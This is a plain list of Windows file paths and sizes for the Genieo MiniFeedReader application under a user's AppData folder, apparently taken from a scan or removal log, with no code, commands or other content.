      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\facebook_twitter.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\welcome_home.gif (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dialogWarning.png (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\core.html (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_input_logo.png (903 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_twitter_btn.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\message_note.png (696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weatherimg.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_ru.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe (825 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ru.css (630 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\ok.png (769 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_small.png (832 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\css\main.css (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-severe-alert.png (977 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\birthday.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\rss.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\white.gif (965 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_baloon_tip.png (158 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowv.png (939 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extNextButton.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-snow.png (998 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\class.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\syncOnButton.png (566 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\body_bg.png (323 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_controls.png (814 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.json (16 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\UIState.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\redirect_handler.html (796 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\counter_bg.png (270 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShareDisabled.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\js\collage.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\counter_bg.png (270 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_video_frame.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame3.png (587 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSq.png (136 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white.png (217 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-storm.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\css\partner.css (930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video.jpg (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\notify.css (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hotItemIcon.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\ajax-loader.gif (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\default.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_ru.properties (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo_small.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray_transparent.png (198 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon.png (432 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\blockTopic.png (137 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\rss.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\shekerKolshehu.gif (52 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowh.png (944 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow_old.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers-scattered.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reportBugButton.png (777 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\button-enable.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\css\main.css (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_image_frame.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon12px.png (543 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.gif (594 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_prev.png (153 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\googleimg.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\background.png (386 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\settings_ui.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie.css (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow.png (206 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\headlines_frame.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_auth_start.png (440 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac2.png (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\x.gif (828 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\message_tip.png (154 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers.png (959 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_9.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton2.png (704 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\main.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture.png (976 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\double_border.png (133 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.properties (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\general.css (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_btn.png (309 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\aggregation_page.css (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\anabel_analytics.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview_ui.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_no_birthdays_bg.png (883 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tryItNow.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_prev.png (164 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-list.txt (837 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-nodebug.js (159 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cakes.png (16 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.cookie.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\magazine_ribon.png (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\test_items.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\hp_guard.html (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_word.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.classpath (355 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\startpage.css (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2.png (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac2.png (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\startpage.tpl (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\parent_proxy.html (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\utils.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\ticker.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fail.png (658 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMacEnableExts.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton2.png (997 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\aggregation_page.js (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extButton.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fbButton.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\index.html (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg.png (121 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon12px.png (592 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\anabel_settings.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_collapse.png (154 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\blank.html (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.properties (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\userpic_overlay.png (190 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicBg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.json (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3rightButton.png (711 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dfImg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebookShareIcon.png (311 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\btn.png (750 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\cmd_close.png (155 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\photos.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\const.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_next.png (150 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pnf.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iPhoneOk.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\goRssButton.png (790 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_btn.png (249 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\followbutton.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicDefault.png (478 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon.png (798 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\normalLevel.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\hide_notification.png (165 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\empty.gif (43 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template3.html (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prowered_by_google.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_7.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DebugUtils.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\close.png (143 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_bg.gif (834 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\disconnectTwitterBtn.png (690 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery-genieo-postmessage.js (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg_white.png (121 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShare.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird2.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin2.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\you_tube.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow_down.png (191 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5sm.png (961 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\footer_right_logo.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\redHome.png (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reopen_btn.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\activity-indicator.gif (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waitingTr.gif (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\defaultCover.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rss.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\layers.css (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\share_btn.png (553 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_video_frame.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hover_bg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\personalizationMeter.css (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fb_icon_big.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\follow.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui_pages.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iphone.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\set_as_homepage_bg.png (993 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fb.gif (97 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_favicon.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tutorial.png (5520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\strip.png (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waiting.gif (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_2.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\settings.css (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\actions.png (588 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\menu_bg.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\translator.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\red_arror_down.png (143 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4sm.png (961 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\warning.png (380 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\videobutton.png (862 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_white.png (222 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\feedbackButton.png (851 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\noItems.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x_white.gif (53 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_fr.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3leftButton.png (687 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\redarr.png (484 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_sep.gif (52 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\dfImg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\forPictures.png (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\layers.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-debug.js (534 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2sm.png (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\wt.png (331 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down_disable.gif (821 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\open_splash.png (696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\poweredByGenieo.png (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton2.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\shortcut.png (381 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear.png (682 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\item_controls_bg.png (167 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\connect_with_facebook.png (828 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\classes.js (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\easer.png (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev2.gif (88 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\social_box.png (253 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\notification_controls.png (478 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_next.png (150 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\tpl\main.tpl (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\underconstructions.jpg (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10sm.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\loader.gif (784 bytes)
